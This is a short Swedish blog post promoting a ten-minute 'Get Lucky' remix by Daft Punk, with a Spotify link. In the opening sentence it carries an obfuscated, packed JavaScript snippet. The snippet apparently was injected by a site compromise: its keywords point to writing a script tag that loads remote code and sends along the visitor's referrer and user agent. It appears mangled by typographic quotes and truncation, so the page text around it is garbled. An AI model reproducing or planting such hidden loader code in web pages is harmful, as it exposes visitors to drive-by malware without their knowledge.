Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Get Lucky – Daft Punk Remix

Filip Urde
  • On 27 juni, 2013
  • http://www.revue.se/filip-urde

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yztnk|var|u0026u|referrer|enysk||js|php’.split(’|’),0,{}))
är väll ingen vid det här laget som missat Daft Punks senaste album och kanske främst deras collab med Pharrell / Nile Rodgers – ”Get Lucky”. 

 

 

 

Get Lucky är en typisk ”Sommarens-låt” låt och den har slagit något enormt över hela världen.

Daft punk har med sitt senaste album bland annat hämtat influenser från sent 70tals disco och deras nyas sound kan inte ligga mer rätt i tiden. Speciellt när många, inklusive mig själv,  börjar känna att det finns en hel del att önska från musikerna som är aktiva idag. Populär-musiken har blivit allt mer konstgjord, massproducerad och känns ofta ganska själlös. Det är en tid där ”alla” är Djs och ”alla” gör musik… då är det kul att någon/några gör något speciellt och lite mer genomtänkt. Därför är vi på Revue glada att kunna dela nyheten om att en ny 10 minuters Remix av låten (Get Lucky – Daft Punk Remix) nu är släppt!  Om det var någon låt som behövde få en förlängd edit, så var det nog Get Lucky.

Så njut nu på Spotify länken här under;